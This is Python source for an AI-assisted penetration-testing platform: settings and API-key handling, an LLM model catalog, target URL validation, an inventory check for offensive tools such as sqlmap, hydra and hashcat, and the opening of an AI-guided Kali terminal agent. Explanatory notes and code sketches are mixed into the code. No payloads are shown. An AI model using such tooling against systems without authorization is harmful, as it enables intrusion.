recon_enabled_by_default: bool = True
enable_model_routing: bool = False
enable_knowledge_augmentation: bool = False
enable_browser_validation: bool = False
max_output_tokens: Optional[int] = None
# Notifications
enable_notifications: bool = False
has_discord_webhook: bool = False
has_telegram_bot: bool = False
has_twilio_credentials: bool = False
notification_severity_filter: str = "critical,high"
class ModelInfo(BaseModel):
"""Info about an available LLM model"""
provider: str
model_id: str
display_name: str
size: Optional[str] = None
context_length: Optional[int] = None
is_local: bool = False
class ModelCatalogResponse(BaseModel):
"""Response from model catalog endpoint"""
provider: str
models: List[ModelInfo]
available: bool
error: Optional[str] = None
def _load_settings_from_env() -> dict:
"""
Load settings from environment variables / .env file on startup.
This ensures settings persist across server restarts and browser sessions.
"""
from dotenv import load_dotenv
# Re-read .env file to pick up disk-persisted values
if ENV_FILE_PATH.exists():
load_dotenv(ENV_FILE_PATH, override=True)
def _env_bool(key: str, default: bool = False) -> bool:
val = os.getenv(key, "").strip().lower()
if val in ("true", "1", "yes"):
return True
if val in ("false", "0", "no"):
return False
return default
def _env_int(key: str, default=None):
val = os.getenv(key, "").strip()
if val:
try:
return int(val)
except ValueError:
pass
return default
# Detect provider from which keys are set
provider = "claude"
if os.getenv("NIM_API_KEY"):
provider = "nim"
elif os.getenv("ANTHROPIC_API_KEY"):
provider = "claude"
elif os.getenv("OPENAI_API_KEY"):
provider = "openai"
elif os.getenv("OPENROUTER_API_KEY"):
provider = "openrouter"
return {
"llm_provider": provider,
"llm_model": os.getenv("DEFAULT_LLM_MODEL", ""),
"anthropic_api_key": os.getenv("ANTHROPIC_API_KEY", ""),
"openai_api_key": os.getenv("OPENAI_API_KEY", ""),
"nim_api_key": os.getenv("NIM_API_KEY", ""),
"openrouter_api_key": os.getenv("OPENROUTER_API_KEY", ""),
"gemini_api_key": os.getenv("GEMINI_API_KEY", ""),
"together_api_key": os.getenv("TOGETHER_API_KEY", ""),
"fireworks_api_key": os.getenv("FIREWORKS_API_KEY", ""),
"ollama_base_url": os.getenv("OLLAMA_BASE_URL", os.getenv("OLLAMA_URL", "")),
"lmstudio_base_url": os.getenv("LMSTUDIO_BASE_URL", os.getenv("LMSTUDIO_URL", "")),
"max_concurrent_scans": _env_int("MAX_CONCURRENT_SCANS", 3),
"aggressive_mode": _env_bool("AGGRESSIVE_MODE", False),
"default_scan_type": os.getenv("DEFAULT_SCAN_TYPE", "full"),
"recon_enabled_by_default": _env_bool("RECON_ENABLED_BY_DEFAULT", True),
"enable_model_routing": _env_bool("ENABLE_MODEL_ROUTING", False),
"enable_knowledge_augmentation": _env_bool("ENABLE_KNOWLEDGE_AUGMENTATION", False),
"enable_browser_validation": _env_bool("ENABLE_BROWSER_VALIDATION", False),
"max_output_tokens": _env_int("MAX_OUTPUT_TOKENS", None),
# Notifications
"enable_notifications": _env_bool("ENABLE_NOTIFICATIONS", False),
"discord_webhook_url": os.getenv("DISCORD_WEBHOOK_URL", ""),
"telegram_bot_token": os.getenv("TELEGRAM_BOT_TOKEN", ""),
"telegram_chat_id": os.getenv("TELEGRAM_CHAT_ID", ""),
"twilio_account_sid": os.getenv("TWILIO_ACCOUNT_SID", ""),
"twilio_auth_token": os.getenv("TWILIO_AUTH_TOKEN", ""),
"twilio_from_number": os.getenv("TWILIO_FROM_NUMBER", ""),
"twilio_to_number": os.getenv("TWILIO_TO_NUMBER", ""),
"notification_severity_filter": os.getenv("NOTIFICATION_SEVERITY_FILTER", "critical,high"),
}
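Two details of `_load_settings_from_env` are easy to miss: unrecognized boolean strings fall back to the default, and provider detection follows a fixed precedence with NIM first. The sketch below restates both against a plain mapping rather than `os.environ` so they can be tested in isolation; the function names and the `PROVIDER_PRECEDENCE` constant are assumptions.

```python
from typing import Mapping

# Same order as the if/elif chain in the loader; first non-empty key wins.
PROVIDER_PRECEDENCE = (
    ("NIM_API_KEY", "nim"),
    ("ANTHROPIC_API_KEY", "claude"),
    ("OPENAI_API_KEY", "openai"),
    ("OPENROUTER_API_KEY", "openrouter"),
)


def env_bool(env: Mapping[str, str], key: str, default: bool = False) -> bool:
    """Parse true/1/yes and false/0/no; anything else returns the default."""
    val = env.get(key, "").strip().lower()
    if val in ("true", "1", "yes"):
        return True
    if val in ("false", "0", "no"):
        return False
    return default


def detect_provider(env: Mapping[str, str]) -> str:
    """Pick the provider from whichever API key is set, defaulting to claude."""
    for var, provider in PROVIDER_PRECEDENCE:
        if env.get(var):
            return provider
    return "claude"


if __name__ == "__main__":
    print(detect_provider({"OPENAI_API_KEY": "sk-test"}))
    print(env_bool({"AGGRESSIVE_MODE": "Yes"}, "AGGRESSIVE_MODE"))
```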
# Load settings from .env on module import (server start)
_settings = _load_settings_from_env()
@router.get("", response_model=SettingsResponse)
async def get_settings():
"""Get current settings"""
return SettingsResponse(
llm_provider=_settings["llm_provider"],
llm_model=_settings.get("llm_model", ""),
has_anthropic_key=bool(_settings["anthropic_api_key"] or os.getenv("ANTHROPIC_API_KEY")),
has_openai_key=bool(_settings["openai_api_key"] or os.getenv("OPENAI_API_KEY")),
has_nim_key=bool(_settings.get("nim_api_key") or os.getenv("NIM_API_KEY")),
has_openrouter_key=bool(_settings["openrouter_api_key"] or os.getenv("OPENROUTER_API_KEY")),
has_gemini_key=bool(_settings.get("gemini_api_key") or os.getenv("GEMINI_API_KEY")),
has_together_key=bool(_settings.get("together_api_key") or os.getenv("TOGETHER_API_KEY")),
has_fireworks_key=bool(_settings.get("fireworks_api_key") or os.getenv("FIREWORKS_API_KEY")),
ollama_base_url=_settings.get("ollama_base_url", ""),
lmstudio_base_url=_settings.get("lmstudio_base_url", ""),
max_concurrent_scans=_settings["max_concurrent_scans"],
aggressive_mode=_settings["aggressive_mode"],
default_scan_type=_settings["default_scan_type"],
recon_enabled_by_default=_settings["recon_enabled_by_default"],
enable_model_routing=_settings["enable_model_routing"],
enable_knowledge_augmentation=_settings["enable_knowledge_augmentation"],
enable_browser_validation=_settings["enable_browser_validation"],
max_output_tokens=_settings["max_output_tokens"],
# Notifications
enable_notifications=_settings.get("enable_notifications", False),
has_discord_webhook=bool(_settings.get("discord_webhook_url")),
has_telegram_bot=bool(_settings.get("telegram_bot_token") and _settings.get("telegram_chat_id")),
has_twilio_credentials=bool(
_settings.get("twilio_account_sid") and _settings.get("twilio_auth_token")
and _settings.get("twilio_from_number") and _settings.get("twilio_to_number")
),
notification_severity_filter=_settings.get("notification_severity_filter", "critical,high"),
)
@router.put("", response_model=SettingsResponse)
async def update_settings(settings_data: SettingsUpdate):
"""Update settings - persists to memory, env vars, AND .env file"""
env_updates: Dict[str, str] = {}
if settings_data.llm_provider is not None:
_settings["llm_provider"] = settings_data.llm_provider
if settings_data.llm_model is not None:
_settings["llm_model"] = settings_data.llm_model
os.environ["DEFAULT_LLM_MODEL"] = settings_data.llm_model
env_updates["DEFAULT_LLM_MODEL"] = settings_data.llm_model
if settings_data.anthropic_api_key is not None:
_settings["anthropic_api_key"] = settings_data.anthropic_api_key
if settings_data.anthropic_api_key:
os.environ["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
env_updates["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
if settings_data.openai_api_key is not None:
_settings["openai_api_key"] = settings_data.openai_api_key
if settings_data.openai_api_key:
os.environ["OPENAI_API_KEY"] = settings_data.openai_api_key
env_updates["OPENAI_API_KEY"] = settings_data.openai_api_key
if settings_data.nim_api_key is not None:
_settings["nim_api_key"] = settings_data.nim_api_key
if settings_data.nim_api_key:
os.environ["NIM_API_KEY"] = settings_data.nim_api_key
env_updates["NIM_API_KEY"] = settings_data.nim_api_key
if settings_data.openrouter_api_key is not None:
_settings["openrouter_api_key"] = settings_data.openrouter_api_key
if settings_data.openrouter_api_key:
os.environ["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
env_updates["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
if settings_data.gemini_api_key is not None:
_settings["gemini_api_key"] = settings_data.gemini_api_key
if settings_data.gemini_api_key:
os.environ["GEMINI_API_KEY"] = settings_data.gemini_api_key
env_updates["GEMINI_API_KEY"] = settings_data.gemini_api_key
if settings_data.together_api_key is not None:
_settings["together_api_key"] = settings_data.together_api_key
if settings_data.together_api_key:
os.environ["TOGETHER_API_KEY"] = settings_data.together_api_key
env_updates["TOGETHER_API_KEY"] = settings_data.together_api_key
if settings_data.fireworks_api_key is not None:
_settings["fireworks_api_key"] = settings_data.fireworks_api_key
if settings_data.fireworks_api_key:
os.environ["FIREWORKS_API_KEY"] = settings_data.fireworks_api_key
env_updates["FIREWORKS_API_KEY"] = settings_data.fireworks_api_key
if settings_data.ollama_base_url is not None:
_settings["ollama_base_url"] = settings_data.ollama_base_url
if settings_data.ollama_base_url:
os.environ["OLLAMA_BASE_URL"] = settings_data.ollama_base_url
env_updates["OLLAMA_BASE_URL"] = settings_data.ollama_base_url
if settings_data.lmstudio_base_url is not None:
_settings["lmstudio_base_url"] = settings_data.lmstudio_base_url
if settings_data.lmstudio_base_url:
os.environ["LMSTUDIO_BASE_URL"] = settings_data.lmstudio_base_url
env_updates["LMSTUDIO_BASE_URL"] = settings_data.lmstudio_base_url
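    # These four are read back by _load_settings_from_env(), so persist them to .env as well
    if settings_data.max_concurrent_scans is not None:
        _settings["max_concurrent_scans"] = settings_data.max_concurrent_scans
        env_updates["MAX_CONCURRENT_SCANS"] = str(settings_data.max_concurrent_scans)
    if settings_data.aggressive_mode is not None:
        _settings["aggressive_mode"] = settings_data.aggressive_mode
        env_updates["AGGRESSIVE_MODE"] = str(settings_data.aggressive_mode).lower()
    if settings_data.default_scan_type is not None:
        _settings["default_scan_type"] = settings_data.default_scan_type
        env_updates["DEFAULT_SCAN_TYPE"] = settings_data.default_scan_type
    if settings_data.recon_enabled_by_default is not None:
        _settings["recon_enabled_by_default"] = settings_data.recon_enabled_by_default
        env_updates["RECON_ENABLED_BY_DEFAULT"] = str(settings_data.recon_enabled_by_default).lower()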
if settings_data.enable_model_routing is not None:
_settings["enable_model_routing"] = settings_data.enable_model_routing
val = str(settings_data.enable_model_routing).lower()
os.environ["ENABLE_MODEL_ROUTING"] = val
env_updates["ENABLE_MODEL_ROUTING"] = val
if settings_data.enable_knowledge_augmentation is not None:
_settings["enable_knowledge_augmentation"] = settings_data.enable_knowledge_augmentation
val = str(settings_data.enable_knowledge_augmentation).lower()
os.environ["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
env_updates["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
if settings_data.enable_browser_validation is not None:
_settings["enable_browser_validation"] = settings_data.enable_browser_validation
val = str(settings_data.enable_browser_validation).lower()
os.environ["ENABLE_BROWSER_VALIDATION"] = val
env_updates["ENABLE_BROWSER_VALIDATION"] = val
if settings_data.max_output_tokens is not None:
_settings["max_output_tokens"] = settings_data.max_output_tokens
if settings_data.max_output_tokens:
os.environ["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
env_updates["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
# Notifications
if settings_data.enable_notifications is not None:
_settings["enable_notifications"] = settings_data.enable_notifications
val = str(settings_data.enable_notifications).lower()
os.environ["ENABLE_NOTIFICATIONS"] = val
env_updates["ENABLE_NOTIFICATIONS"] = val
if settings_data.discord_webhook_url is not None:
_settings["discord_webhook_url"] = settings_data.discord_webhook_url
os.environ["DISCORD_WEBHOOK_URL"] = settings_data.discord_webhook_url
env_updates["DISCORD_WEBHOOK_URL"] = settings_data.discord_webhook_url
if settings_data.telegram_bot_token is not None:
_settings["telegram_bot_token"] = settings_data.telegram_bot_token
os.environ["TELEGRAM_BOT_TOKEN"] = settings_data.telegram_bot_token
env_updates["TELEGRAM_BOT_TOKEN"] = settings_data.telegram_bot_token
if settings_data.telegram_chat_id is not None:
_settings["telegram_chat_id"] = settings_data.telegram_chat_id
os.environ["TELEGRAM_CHAT_ID"] = settings_data.telegram_chat_id
env_updates["TELEGRAM_CHAT_ID"] = settings_data.telegram_chat_id
if settings_data.twilio_account_sid is not None:
_settings["twilio_account_sid"] = settings_data.twilio_account_sid
os.environ["TWILIO_ACCOUNT_SID"] = settings_data.twilio_account_sid
env_updates["TWILIO_ACCOUNT_SID"] = settings_data.twilio_account_sid
if settings_data.twilio_auth_token is not None:
_settings["twilio_auth_token"] = settings_data.twilio_auth_token
os.environ["TWILIO_AUTH_TOKEN"] = settings_data.twilio_auth_token
env_updates["TWILIO_AUTH_TOKEN"] = settings_data.twilio_auth_token
if settings_data.twilio_from_number is not None:
_settings["twilio_from_number"] = settings_data.twilio_from_number
os.environ["TWILIO_FROM_NUMBER"] = settings_data.twilio_from_number
env_updates["TWILIO_FROM_NUMBER"] = settings_data.twilio_from_number
if settings_data.twilio_to_number is not None:
_settings["twilio_to_number"] = settings_data.twilio_to_number
os.environ["TWILIO_TO_NUMBER"] = settings_data.twilio_to_number
env_updates["TWILIO_TO_NUMBER"] = settings_data.twilio_to_number
if settings_data.notification_severity_filter is not None:
_settings["notification_severity_filter"] = settings_data.notification_severity_filter
os.environ["NOTIFICATION_SEVERITY_FILTER"] = settings_data.notification_severity_filter
env_updates["NOTIFICATION_SEVERITY_FILTER"] = settings_data.notification_severity_filter
# Persist to .env file on disk
if env_updates:
_update_env_file(env_updates)
    # Reload notification config on every update so changed notification fields take effect
try:
from backend.core.notification_manager import notification_manager
notification_manager.reload_config()
except ImportError:
pass
return await get_settings()
@router.post("/notifications/test/{channel}")
async def test_notification_channel(channel: str):
"""Send a test notification to a specific channel (discord, telegram, whatsapp)."""
try:
from backend.core.notification_manager import notification_manager
result = await notification_manager.test_channel(channel)
return result
except ImportError:
raise HTTPException(500, "Notification manager not available")
@router.post("/clear-database")
async def clear_database(db: AsyncSession = Depends(get_db)):
"""Clear all data from the database (reset to fresh state)"""
try:
# Delete in correct order to respect foreign key constraints
await db.execute(delete(VulnerabilityTest))
await db.execute(delete(Vulnerability))
await db.execute(delete(Endpoint))
await db.execute(delete(Report))
await db.execute(delete(Target))
await db.execute(delete(Scan))
await db.commit()
return {
"message": "Database cleared successfully",
"status": "success"
}
except Exception as e:
await db.rollback()
raise HTTPException(status_code=500, detail=f"Failed to clear database: {str(e)}")
@router.get("/stats")
async def get_database_stats(db: AsyncSession = Depends(get_db)):
"""Get database statistics"""
from sqlalchemy import func
scans_count = (await db.execute(select(func.count()).select_from(Scan))).scalar() or 0
vulns_count = (await db.execute(select(func.count()).select_from(Vulnerability))).scalar() or 0
endpoints_count = (await db.execute(select(func.count()).select_from(Endpoint))).scalar() or 0
reports_count = (await db.execute(select(func.count()).select_from(Report))).scalar() or 0
return {
"scans": scans_count,
"vulnerabilities": vulns_count,
"endpoints": endpoints_count,
"reports": reports_count
}
@router.get("/tools")
async def get_installed_tools():
"""Check which security tools are installed"""
import shutil
# Complete list of 40+ tools
tools = {
"recon": [
"subfinder", "amass", "assetfinder", "chaos", "uncover",
"dnsx", "massdns", "puredns", "cero", "tlsx", "cdncheck"
],
"web_discovery": [
"httpx", "httprobe", "katana", "gospider", "hakrawler",
"gau", "waybackurls", "cariddi", "getJS", "gowitness"
],
"fuzzing": [
"ffuf", "gobuster", "dirb", "dirsearch", "wfuzz", "arjun", "paramspider"
],
"vulnerability_scanning": [
"nuclei", "nikto", "sqlmap", "xsstrike", "dalfox", "crlfuzz"
],
"port_scanning": [
"nmap", "naabu", "rustscan"
],
"utilities": [
"gf", "qsreplace", "unfurl", "anew", "uro", "jq"
],
"tech_detection": [
"whatweb", "wafw00f"
],
"exploitation": [
"hydra", "medusa", "john", "hashcat"
],
"network": [
"curl", "wget", "dig", "whois"
]
}
results = {}
total_installed = 0
total_tools = 0
for category, tool_list in tools.items():
results[category] = {}
for tool in tool_list:
total_tools += 1
# Check if tool exists in PATH
is_installed = shutil.which(tool) is not None
results[category][tool] = is_installed
if is_installed:
total_installed += 1
return {
"tools": results,
"summary": {
"total": total_tools,
"installed": total_installed,
"missing": total_tools - total_installed,
"percentage": round((total_installed / total_tools) * 100, 1)
}
}
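The installed-tool check relies on `shutil.which`, which returns the executable's path or `None`. A compact sketch of the same summary follows, with the lookup injected so it can run without any of the tools present; `summarize_tools` and its `which` parameter are assumptions, and the zero-total guard is an addition the original does not need because its tool list is static.

```python
import shutil
from typing import Callable, Dict, List, Optional


def summarize_tools(
    tools: Dict[str, List[str]],
    which: Callable[[str], Optional[str]] = shutil.which,
) -> dict:
    """Report per-category availability plus an overall summary."""
    results = {
        category: {tool: which(tool) is not None for tool in names}
        for category, names in tools.items()
    }
    total = sum(len(found) for found in results.values())
    installed = sum(sum(found.values()) for found in results.values())
    # Guard against an empty tool list to avoid dividing by zero
    percentage = round(installed / total * 100, 1) if total else 0.0
    return {
        "tools": results,
        "summary": {
            "total": total,
            "installed": installed,
            "missing": total - installed,
            "percentage": percentage,
        },
    }


if __name__ == "__main__":
    print(summarize_tools({"network": ["curl", "wget"]})["summary"])
```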
# --- Model Catalog ---
# Cache for model catalog queries (60-second TTL)
_model_cache: Dict[str, dict] = {}
_model_cache_time: Dict[str, float] = {}
MODEL_CACHE_TTL = 60 # seconds
# Common cloud models for dropdown suggestions
CLOUD_MODELS = {
"claude": [
{"model_id": "claude-opus-4-6-20250918", "display_name": "Claude Opus 4.6", "context_length": 1000000},
{"model_id": "claude-sonnet-4-6-20250918", "display_name": "Claude Sonnet 4.6", "context_length": 1000000},
{"model_id": "claude-sonnet-4-5-20250929", "display_name": "Claude Sonnet 4.5", "context_length": 200000},
{"model_id": "claude-haiku-4-5-20251001", "display_name": "Claude Haiku 4.5", "context_length": 200000},
{"model_id": "claude-sonnet-4-20250514", "display_name": "Claude Sonnet 4", "context_length": 200000},
{"model_id": "claude-opus-4-20250514", "display_name": "Claude Opus 4", "context_length": 200000},
],
"openai": [
{"model_id": "gpt-4o", "display_name": "GPT-4o", "context_length": 128000},
{"model_id": "gpt-4o-mini", "display_name": "GPT-4o Mini", "context_length": 128000},
{"model_id": "gpt-4.1", "display_name": "GPT-4.1", "context_length": 1047576},
{"model_id": "gpt-4.1-mini", "display_name": "GPT-4.1 Mini", "context_length": 1047576},
{"model_id": "o3-mini", "display_name": "O3 Mini", "context_length": 200000},
],
"gemini": [
{"model_id": "gemini-pro", "display_name": "Gemini Pro", "context_length": 30720},
{"model_id": "gemini-1.5-pro", "display_name": "Gemini 1.5 Pro", "context_length": 1048576},
{"model_id": "gemini-1.5-flash", "display_name": "Gemini 1.5 Flash", "context_length": 1048576},
{"model_id": "gemini-2.0-flash", "display_name": "Gemini 2.0 Flash", "context_length": 1048576},
],
"together": [
{"model_id": "meta-llama/Llama-3.3-70B-Instruct-Turbo", "display_name": "Llama 3.3 70B", "context_length": 131072},
{"model_id": "Qwen/Qwen2.5-72B-Instruct-Turbo", "display_name": "Qwen 2.5 72B", "context_length": 32768},
{"model_id": "deepseek-ai/DeepSeek-R1", "display_name": "DeepSeek R1", "context_length": 65536},
{"model_id": "mistralai/Mixtral-8x22B-Instruct-v0.1", "display_name": "Mixtral 8x22B", "context_length": 65536},
],
"fireworks": [
{"model_id": "accounts/fireworks/models/llama-v3p3-70b-instruct", "display_name": "Llama 3.3 70B", "context_length": 131072},
{"model_id": "accounts/fireworks/models/qwen2p5-72b-instruct", "display_name": "Qwen 2.5 72B", "context_length": 32768},
{"model_id": "accounts/fireworks/models/deepseek-r1", "display_name": "DeepSeek R1", "context_length": 65536},
],
"codex": [
{"model_id": "codex-mini-latest", "display_name": "Codex Mini", "context_length": 192000},
],
"nim": [
{"model_id": "openai/gpt-oss-120b", "display_name": "NVIDIA GPT-OSS 120B", "context_length": 32768},
{"model_id": "meta/llama-3.1-70b-instruct", "display_name": "Llama 3.1 70B (NIM)", "context_length": 32768},
{"model_id": "meta/llama-3.1-405b-instruct", "display_name": "Llama 3.1 405B (NIM)", "context_length": 32768},
],
}
@router.get("/models/{provider}", response_model=ModelCatalogResponse)
async def get_provider_models(provider: str):
"""Get available models for a specific provider.
For local providers (ollama, lmstudio), queries the running service.
For cloud providers, returns common model suggestions.
For openrouter, queries the API for available models.
"""
# Check cache
now = time.time()
if provider in _model_cache and (now - _model_cache_time.get(provider, 0)) < MODEL_CACHE_TTL:
return ModelCatalogResponse(**_model_cache[provider])
if provider == "ollama":
result = await _get_ollama_models()
elif provider == "lmstudio":
result = await _get_lmstudio_models()
elif provider == "openrouter":
result = await _get_openrouter_models()
elif provider in CLOUD_MODELS:
result = {
"provider": provider,
"models": [
ModelInfo(
provider=provider,
model_id=m["model_id"],
display_name=m["display_name"],
context_length=m.get("context_length"),
is_local=False,
).dict()
for m in CLOUD_MODELS[provider]
],
"available": True,
"error": None,
}
else:
raise HTTPException(400, f"Unknown provider: {provider}")
# Cache the result
_model_cache[provider] = result
_model_cache_time[provider] = now
return ModelCatalogResponse(**result)
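The per-provider caching above can be sketched in isolation. This is a minimal illustration, not the module's actual code: `TTLCache` and its injectable `clock` parameter are hypothetical names introduced here so that expiry can be exercised without sleeping.

```python
import time
from typing import Any, Callable, Dict, Optional, Tuple


class TTLCache:
    """Tiny time-based cache; `clock` is injectable so expiry can be tested."""

    def __init__(self, ttl_seconds: float, clock: Callable[[], float] = time.time) -> None:
        self._ttl = ttl_seconds
        self._clock = clock
        # key -> (time the value was stored, value)
        self._entries: Dict[str, Tuple[float, Any]] = {}

    def get(self, key: str) -> Optional[Any]:
        entry = self._entries.get(key)
        if entry is None:
            return None
        stored_at, value = entry
        if self._clock() - stored_at >= self._ttl:
            # Entry is stale: drop it so the caller refetches.
            del self._entries[key]
            return None
        return value

    def put(self, key: str, value: Any) -> None:
        self._entries[key] = (self._clock(), value)
```

Keeping the timestamp next to the value (rather than in a second dict, as the endpoint does) means the two can never drift apart; whether that matters for this endpoint is a judgment call.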
async def _get_ollama_models() -> dict:
"""Query Ollama for installed models."""
import aiohttp
ollama_url = os.getenv("OLLAMA_BASE_URL", os.getenv("OLLAMA_URL", "http://localhost:11434"))
try:
async with aiohttp.ClientSession() as session:
async with session.get(
f"{ollama_url}/api/tags",
timeout=aiohttp.ClientTimeout(total=3)
) as resp:
if resp.status != 200:
return {"provider": "ollama", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("models", []):
name = m.get("name", "")
size_bytes = m.get("size", 0)
size_str = f"{size_bytes / 1e9:.1f}GB" if size_bytes else None
details = m.get("details", {})
models.append(ModelInfo(
provider="ollama",
model_id=name,
display_name=name,
size=size_str,
context_length=details.get("context_length"),
is_local=True,
).dict())
return {"provider": "ollama", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "ollama", "models": [], "available": False, "error": str(e)}
async def _get_lmstudio_models() -> dict:
"""Query LM Studio for loaded models."""
import aiohttp
lmstudio_url = os.getenv("LMSTUDIO_BASE_URL", os.getenv("LMSTUDIO_URL", "http://localhost:1234"))
try:
async with aiohttp.ClientSession() as session:
async with session.get(
f"{lmstudio_url}/v1/models",
timeout=aiohttp.ClientTimeout(total=3)
) as resp:
if resp.status != 200:
return {"provider": "lmstudio", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("data", []):
model_id = m.get("id", "")
models.append(ModelInfo(
provider="lmstudio",
model_id=model_id,
display_name=model_id,
is_local=True,
).dict())
return {"provider": "lmstudio", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "lmstudio", "models": [], "available": False, "error": str(e)}
async def _get_openrouter_models() -> dict:
"""Query OpenRouter for available models."""
import aiohttp
api_key = os.getenv("OPENROUTER_API_KEY", "")
try:
headers = {}
if api_key:
headers["Authorization"] = f"Bearer {api_key}"
async with aiohttp.ClientSession() as session:
async with session.get(
"https://openrouter.ai/api/v1/models",
headers=headers,
timeout=aiohttp.ClientTimeout(total=5)
) as resp:
if resp.status != 200:
return {"provider": "openrouter", "models": [], "available": False, "error": f"HTTP {resp.status}"}
data = await resp.json()
models = []
for m in data.get("data", [])[:100]: # Limit to 100 models
model_id = m.get("id", "")
name = m.get("name", model_id)
ctx = m.get("context_length")
models.append(ModelInfo(
provider="openrouter",
model_id=model_id,
display_name=name,
context_length=ctx,
is_local=False,
).dict())
return {"provider": "openrouter", "models": models, "available": True, "error": None}
except Exception as e:
return {"provider": "openrouter", "models": [], "available": False, "error": str(e)}
-142
@@ -1,142 +0,0 @@
"""
NeuroSploit v3 - Targets API Endpoints
"""
from typing import List
from fastapi import APIRouter, Depends, HTTPException, UploadFile, File
from sqlalchemy.ext.asyncio import AsyncSession
from urllib.parse import urlparse
import re
from backend.db.database import get_db
from backend.schemas.target import TargetCreate, TargetBulkCreate, TargetValidation, TargetResponse
router = APIRouter()
def validate_url(url: str) -> TargetValidation:
"""Validate and parse a URL"""
url = url.strip()
if not url:
return TargetValidation(url=url, valid=False, error="URL is empty")
# URL pattern
url_pattern = re.compile(
r'^https?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,63}\.?|'
r'localhost|'
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
r'(?::\d+)?'
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# Try with the URL as-is
if url_pattern.match(url):
normalized = url
elif url_pattern.match(f"https://{url}"):
normalized = f"https://{url}"
else:
return TargetValidation(url=url, valid=False, error="Invalid URL format")
# Parse URL
parsed = urlparse(normalized)
return TargetValidation(
url=url,
valid=True,
normalized_url=normalized,
hostname=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == "https" else 80),
protocol=parsed.scheme
)
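The normalization step in `validate_url` (add a scheme when missing, then fill in the default port) can be sketched on its own. This is an illustration under assumptions: `normalize_target` is a hypothetical helper, it returns a plain dict instead of `TargetValidation`, and it deliberately skips the regex check shown above.

```python
from urllib.parse import urlparse


def normalize_target(raw: str, default_scheme: str = "https") -> dict:
    """Prepend a scheme if none is present and derive host, port and protocol."""
    candidate = raw.strip()
    if "://" not in candidate:
        candidate = f"{default_scheme}://{candidate}"
    parsed = urlparse(candidate)
    # Fall back to the scheme's well-known port when the URL carries none.
    default_port = 443 if parsed.scheme == "https" else 80
    return {
        "normalized_url": candidate,
        "hostname": parsed.hostname,
        "port": parsed.port or default_port,
        "protocol": parsed.scheme,
    }
```

For example, `normalize_target("example.com:8080/path")` yields port `8080` over `https`, while `normalize_target("http://localhost")` falls back to port `80`.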
@router.post("/validate", response_model=TargetValidation)
async def validate_target(target: TargetCreate):
"""Validate a single target URL"""
return validate_url(target.url)
@router.post("/validate/bulk", response_model=List[TargetValidation])
async def validate_targets_bulk(targets: TargetBulkCreate):
"""Validate multiple target URLs"""
results = []
for url in targets.urls:
results.append(validate_url(url))
return results
@router.post("/upload", response_model=List[TargetValidation])
async def upload_targets(file: UploadFile = File(...)):
"""Upload a file with URLs (one per line)"""
if not file.filename:
raise HTTPException(status_code=400, detail="No file provided")
# Check file extension
allowed_extensions = {".txt", ".csv", ".lst"}
ext = "." + file.filename.split(".")[-1].lower() if "." in file.filename else ""
if ext not in allowed_extensions:
raise HTTPException(
status_code=400,
detail=f"Invalid file type. Allowed: {', '.join(sorted(allowed_extensions))}"
)
# Read file content
content = await file.read()
try:
text = content.decode("utf-8")
except UnicodeDecodeError:
try:
text = content.decode("latin-1")
except Exception:
raise HTTPException(status_code=400, detail="Unable to decode file")
# Parse URLs (one per line, or comma-separated)
urls = []
for line in text.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# Handle comma-separated URLs
if "," in line and "://" in line:
for url in line.split(","):
url = url.strip()
if url:
urls.append(url)
else:
urls.append(line)
if not urls:
raise HTTPException(status_code=400, detail="No URLs found in file")
# Validate all URLs
results = []
for url in urls:
results.append(validate_url(url))
return results
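The line-splitting rules used by the upload handler (skip blanks and `#` comments, split a line on commas only when it contains a scheme) can be pulled into a pure function, which makes them easy to test without an `UploadFile`. `split_targets` is a hypothetical name for this sketch.

```python
from typing import List


def split_targets(text: str) -> List[str]:
    """Return candidate URLs from text with one or more targets per line."""
    urls: List[str] = []
    for line in text.splitlines():
        line = line.strip()
        # Ignore empty lines and comment lines.
        if not line or line.startswith("#"):
            continue
        # Only treat commas as separators when the line looks like URLs.
        if "," in line and "://" in line:
            urls.extend(part.strip() for part in line.split(",") if part.strip())
        else:
            urls.append(line)
    return urls
```

Each returned string would still need to go through `validate_url`; the sketch only covers the splitting.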
@router.post("/parse-input", response_model=List[TargetValidation])
async def parse_target_input(input_text: str):
"""Parse target input (comma-separated or newline-separated)"""
urls = []
# Split by newlines first
for line in input_text.split("\n"):
line = line.strip()
if not line:
continue
# Then split by commas
for url in line.split(","):
url = url.strip()
if url:
urls.append(url)
if not urls:
raise HTTPException(status_code=400, detail="No URLs provided")
results = []
for url in urls:
results.append(validate_url(url))
return results
-753
@@ -1,753 +0,0 @@
"""
Terminal Agent API - Interactive infrastructure pentesting via AI chat + Docker sandbox.
Provides session-based terminal interaction with AI-guided command execution,
exploitation path tracking, and VPN status monitoring.
"""
import asyncio
import logging
import re
import time
import uuid
from datetime import datetime, timezone
from typing import Dict, List, Optional
from fastapi import APIRouter, HTTPException, UploadFile, File, Form
from pydantic import BaseModel
from core.llm_manager import LLMManager
from core.sandbox_manager import get_sandbox
logger = logging.getLogger(__name__)
router = APIRouter()
# ---------------------------------------------------------------------------
# In-memory session store
# ---------------------------------------------------------------------------
terminal_sessions: Dict[str, Dict] = {}
# Map session_id -> KaliSandbox instance (per-session container)
session_sandboxes: Dict[str, object] = {}
# ---------------------------------------------------------------------------
# Pre-built templates
# ---------------------------------------------------------------------------
TEMPLATES = {
"network_scanner": {
"name": "Network Scanner",
"description": "Host discovery, port scanning, and service detection",
"system_prompt": (
"You are an expert network reconnaissance specialist. You guide the "
"operator through systematic host discovery, port scanning, and service "
